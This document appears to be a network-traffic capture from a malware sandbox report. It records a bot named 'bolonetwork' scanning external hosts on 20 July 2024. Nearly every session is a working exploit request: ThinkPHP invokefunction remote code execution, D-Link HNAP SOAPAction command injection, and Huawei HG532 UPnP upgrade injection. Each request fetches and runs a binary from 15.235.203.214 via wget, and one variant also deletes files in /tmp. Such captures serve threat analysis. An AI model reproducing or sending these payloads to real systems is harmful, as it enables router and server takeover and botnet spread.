                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                87192.168.2.145471895.50.236.3280
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.680217028 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                88192.168.2.1434480125.204.49.2138081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.680525064 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                89192.168.2.144492695.187.58.23880
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.684818983 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                90192.168.2.14430904.188.104.138081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.695764065 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                91192.168.2.143611695.234.250.13780
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.705488920 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                92192.168.2.144706695.191.67.24680
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.706662893 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                93192.168.2.145727887.232.28.1138081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.707729101 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                94192.168.2.145888895.164.165.17580
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.714838982 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                95192.168.2.144204295.122.145.11980
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.719275951 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                96192.168.2.144713295.219.116.4980
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.724503040 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                97192.168.2.145012495.88.159.15380
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.731070995 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                98192.168.2.144153695.255.231.5680
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.736052990 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                99192.168.2.145700295.81.227.11380
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.741159916 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                100192.168.2.143795095.159.5.8580
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.746531963 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                101192.168.2.144330095.183.13.880
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.751602888 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                102192.168.2.146079295.224.183.8580
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.756510019 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                103192.168.2.143431695.63.149.24980
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.762923956 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                104192.168.2.143969495.67.19.10780
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.771676064 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                105192.168.2.143356895.101.7.15080
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.777093887 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                106192.168.2.145271095.214.176.10480
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.782339096 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                107192.168.2.145651895.216.245.12680
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.787734985 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                108192.168.2.1440926112.91.135.21580
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.793143034 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                109192.168.2.1434522112.252.3.3280
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.817291975 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                110192.168.2.1442340197.112.26.20037215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.827023029 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                111192.168.2.1448590157.183.110.4237215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.827023029 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                112192.168.2.1443638197.164.78.12237215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.827208996 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
